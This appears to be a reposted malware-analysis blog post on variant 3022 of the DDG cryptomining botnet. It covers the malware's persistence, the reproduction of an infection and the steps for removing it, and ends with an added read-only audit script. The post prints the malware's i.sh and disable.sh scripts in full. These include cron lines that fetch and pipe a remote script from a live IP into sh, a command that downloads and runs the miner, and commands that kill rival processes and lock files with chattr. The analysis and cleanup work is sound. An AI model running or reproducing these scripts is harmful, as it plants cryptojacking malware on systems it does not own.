The DDG Family Bundle: Variant 3022
This post reproduces the new variant 3022 based on the DDG analysis that 360Netlab recently published; it covers some of the analysis and the removal method.
This post is for study and exchange only and is meant to give victims ideas for cleanup; do not use it for illegal purposes. The author bears no responsibility for any consequences.
For details see the write-up: https://blog.netlab.360.com/fast-analyze-ddg-v3021-and-v3022/
一、Download
Download script: http://119.9.106.27:8000/i.sh (the name i.sh is DDG's usual style)
Sample location: 119.9.106.27:8000/static/3022/
First download the i.sh script and look at what is inside:
# i.sh as served; lines starting with "#" are analyst notes
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
# Persistence: re-fetch i.sh every 15 minutes via crontab and two cron spool files
echo "*/15 * * * * (curl -fsSL http://119.9.106.27:8000/i.sh||wget -q -O- http://119.9.106.27:8000/i.sh) | sh" | crontab -
echo "" > /var/spool/cron/root
echo "*/15 * * * * wget -q -O- http://119.9.106.27:8000/i.sh | sh" >> /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/crontabs/root
echo "*/15 * * * * wget -q -O- http://119.9.106.27:8000/i.sh | sh" >> /var/spool/cron/crontabs/root
# Pick the last writable directory among /tmp, /usr/local/bin, /usr/libexec, /usr/bin and add it to PATH
cd /tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable
export PATH=$PATH:$(pwd)
# Fetch the architecture-specific miner as "lrnbbce" unless it is already running, then start it
ps auxf | grep -v grep | grep lrnbbce || rm -rf lrnbbce
if [ ! -f "lrnbbce" ]; then
    wget -q http://119.9.106.27:8000/static/3022/ddgs.$(uname -m) -O lrnbbce
fi
chmod +x lrnbbce
$(pwd)/lrnbbce || /usr/bin/lrnbbce || /usr/libexec/lrnbbce || /usr/local/bin/lrnbbce || lrnbbce || ./lrnbbce || /tmp/lrnbbce
# Kill processes using the sibling names lrnbbcb, lrnbbcc, lrnbbcd
ps auxf | grep -v grep | grep lrnbbcb | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep lrnbbcc | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep lrnbbcd | awk '{print $2}' | xargs kill -9
The same old DDG routine: set the PATH variable, add a cron job, download and run the miner, and delete or disable other mining trojans (competition in the mining business is fierce).
Starting with version 3014 it also pushes a cloud-delivered disable.sh to wipe out competitors centrally.
Script address: http://119.9.106.27:8000/static/disable.sh, contents as follows:
# disable.sh as served; lines starting with "#" are analyst notes
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
# Occupy rival miners' paths with empty, non-writable, non-executable, immutable files
mkdir -p /opt/yilu/work/{xig,xige} /usr/bin/bsd-port
touch /opt/yilu/mservice /opt/yilu/work/xig/xig /opt/yilu/work/xige/xige /tmp/thisxxs /usr/bin/.sshd /usr/bin/bsd-port/getty /usr/bin/bsd-port/.dbus /usr/bin/bsd-port/nmi /tmp/php /tmp/name /tmp/xc.x86_64
chmod -w /opt/yilu/work/xig /opt/yilu/work/xige /usr/bin/bsd-port
chmod -x /opt/yilu/mservice /opt/yilu/work/xig/xig /opt/yilu/work/xige/xige /tmp/thisxxs /usr/bin/.sshd /usr/bin/bsd-port/getty /usr/bin/bsd-port/.dbus /usr/bin/bsd-port/nmi /tmp/php /tmp/name /tmp/xc.x86_64
chattr +i /opt/yilu/mservice /opt/yilu/work/xig/xig /opt/yilu/work/xige/xige /tmp/thisxxs /usr/bin/.sshd /usr/bin/bsd-port/getty /usr/bin/bsd-port/.dbus /usr/bin/bsd-port/nmi /tmp/php /tmp/name /tmp/xc.x86_64
# Same treatment for the rivals' init.d and rc*.d entries
rm -rf /etc/init.d/{DbSecuritySpt,selinux} /etc/rc{1..5}.d/S97DbSecuritySpt /etc/rc{1..5}.d/S99selinux
touch /etc/init.d/{DbSecuritySpt,selinux} /etc/rc{1..5}.d/S97DbSecuritySpt /etc/rc{1..5}.d/S99selinux
chmod -rw /etc/init.d/{DbSecuritySpt,selinux} /etc/rc{1..5}.d/S97DbSecuritySpt /etc/rc{1..5}.d/S99selinux
chattr +i /etc/init.d/{DbSecuritySpt,selinux} /etc/rc{1..5}.d/S97DbSecuritySpt /etc/rc{1..5}.d/S99selinux
# Kill the gates/moni processes whose PIDs are stored in /tmp/*.lod and delete their binaries
if [ -e "/tmp/gates.lod" ]; then
    rm -rf $(readlink /proc/$(cat /tmp/gates.lod)/exe)
    kill -9 $(cat /tmp/gates.lod)
    rm -rf $(readlink /proc/$(cat /tmp/moni.lod)/exe)
    kill -9 $(cat /tmp/moni.lod)
    rm -rf /tmp/{gates,moni}.lod
fi
# Kill the remaining rival miner processes by path
ps auxf | grep -v grep | grep /tmp/thisxxs | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep /opt/yilu/work/xig/xig | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep /opt/yilu/mservice | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep /usr/bin/.sshd | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep /usr/bin/bsd-port | awk '{print $2}' | xargs kill -9
The rival mining processes are collected in this script so it can kill yilu, the BillGates family's gates process, and so on.
That was the earlier version, though; the current one is more advanced and delivers a binary named disable directly.
For what this disable binary does, refer to the 360 article (the image is from the 360Netlab blog).
To block other miners, DDG 3022 currently takes the following measures:
1. Modify the hosts file to block other miners' downloads
2. Kill other mining programs
3. Use the disable binary
二、Reproducing the run
Next, run the script to begin the reproduction; the crontab entry has been written.
The CPU is fully loaded and the miner is running.
Look at the sample files under /tmp:
三、Removal
The same old approach: whatever the mining trojan did, we do the reverse.
Remove from /var/spool/cron/crontabs/root and /var/spool/cron/root the entry that was written by echo "*/15 * * * * curl -fsSL http://119.9.106.27:8000/i.sh | sh" >> /var/spool/cron/root
Delete /tmp/6Tx3Wq, /tmp/disable and /usr/bin/lrnbbce
Kill the processes 6Tx3Wq and lrnbbce
At this point the miner has been cleaned up; afterwards the added hosts entries and other files can be removed.
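The following is an added example, not code from the original post or from 360Netlab. It turns the three cleanup steps above and the hosts-file measure listed in section 一 into a read-only audit: it finds the "fetch remote script | sh" loader line in a crontab file, flags hosts entries that sink a name to a null or loopback address, checks which of the post's dropped-file paths exist, and prints the removal order for an operator to review rather than executing it. The shape of the hosts edit ("0.0.0.0 name" / "127.0.0.1 name") is an assumption, since the post does not show the actual entries; the sample crontab and hosts content are constructed inline so the script runs offline without root.

```sh
#!/bin/sh
# Added example (not from the original post): audit and planned cleanup for
# the DDG 3022 persistence described above. Sample inputs are constructed.

DDG_HOST='119.9.106.27:8000'                          # download host from the post
DDG_FILES='/tmp/6Tx3Wq /tmp/disable /usr/bin/lrnbbce' # dropped files from the post
DDG_PROCS='6Tx3Wq lrnbbce'                            # process names from the post

# Crontab lines that pipe a remotely fetched script into sh, printed as
# "lineno:line". Matches both the (curl||wget) form and the plain wget form.
find_loader_lines() {
    grep -nE '(curl|wget)[^|]*https?://[^ ]+[^|]*\|[[:space:]]*sh([[:space:]]|$)' "$1" 2>/dev/null
}

# Number of such lines; 0 when the file is absent.
count_loader_lines() {
    find_loader_lines "$1" | wc -l | tr -d ' '
}

# Exit status 0 if the file mentions the download host named in the post.
references_ddg_host() {
    grep -q "$DDG_HOST" "$1" 2>/dev/null
}

# Hosts-file entries that map a name to 0.0.0.0 or 127.0.0.1, excluding the
# normal localhost entries. Assumption: this is the shape of DDG's hosts edit.
find_sinkholed_hosts() {
    grep -nE '^[[:space:]]*(0\.0\.0\.0|127\.0\.0\.1)[[:space:]]+' "$1" 2>/dev/null |
        grep -vE '[[:space:]](localhost|localhost\.localdomain|ip6-[a-z]+)([[:space:]]|$)'
}

# Print whichever of the post's dropped-file paths exist on this machine.
list_existing_iocs() {
    for f in $DDG_FILES; do
        [ -e "$f" ] && echo "$f"
    done
    return 0
}

# The removal order from the post, as commands for an operator to review:
# cron entries first so the loader cannot re-arm, then the dropped files,
# then the processes, then the hosts entries.
print_cleanup_plan() {
    for c in /var/spool/cron/root /var/spool/cron/crontabs/root; do
        echo "sed -i '\\#$DDG_HOST#d' $c"
    done
    echo "rm -f $DDG_FILES"
    for p in $DDG_PROCS; do
        echo "pkill -9 -x $p"
    done
    echo "# then remove the entries reported by: find_sinkholed_hosts /etc/hosts"
}

# --- constructed sample inputs (not captured from a real host) ---
SAMPLE_DIR=$(mktemp -d)
trap 'rm -rf "$SAMPLE_DIR"' EXIT
SAMPLE_CRON="$SAMPLE_DIR/root"
SAMPLE_HOSTS="$SAMPLE_DIR/hosts"
cat > "$SAMPLE_CRON" <<'EOF'
0 3 * * * /usr/local/bin/backup.sh
*/15 * * * * (curl -fsSL http://119.9.106.27:8000/i.sh||wget -q -O- http://119.9.106.27:8000/i.sh) | sh
*/15 * * * * wget -q -O- http://119.9.106.27:8000/i.sh | sh
EOF
cat > "$SAMPLE_HOSTS" <<'EOF'
127.0.0.1 localhost
::1 localhost ip6-localhost
0.0.0.0 rival-miner.invalid
127.0.0.1 other-rival.invalid
EOF

echo "== loader lines in sample crontab =="; find_loader_lines "$SAMPLE_CRON"
echo "== sinkholed names in sample hosts =="; find_sinkholed_hosts "$SAMPLE_HOSTS"
echo "== dropped files present on this machine =="; list_existing_iocs
echo "== cleanup plan =="; print_cleanup_plan
```

On a real host, point find_loader_lines at /var/spool/cron/root, /var/spool/cron/crontabs/root and the output of crontab -l, and find_sinkholed_hosts at /etc/hosts; the plan is printed rather than run so the cron entries are confirmed before anything is deleted.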
References:
https://blog.netlab.360.com/https-blog-netlab-360-com-a-fast-ddg-3014-analyze/
https://blog.netlab.360.com/fast-analyze-ddg-v3021-and-v3022/
Reposted from: https://www.cnblogs.com/Id3al/p/10706324.html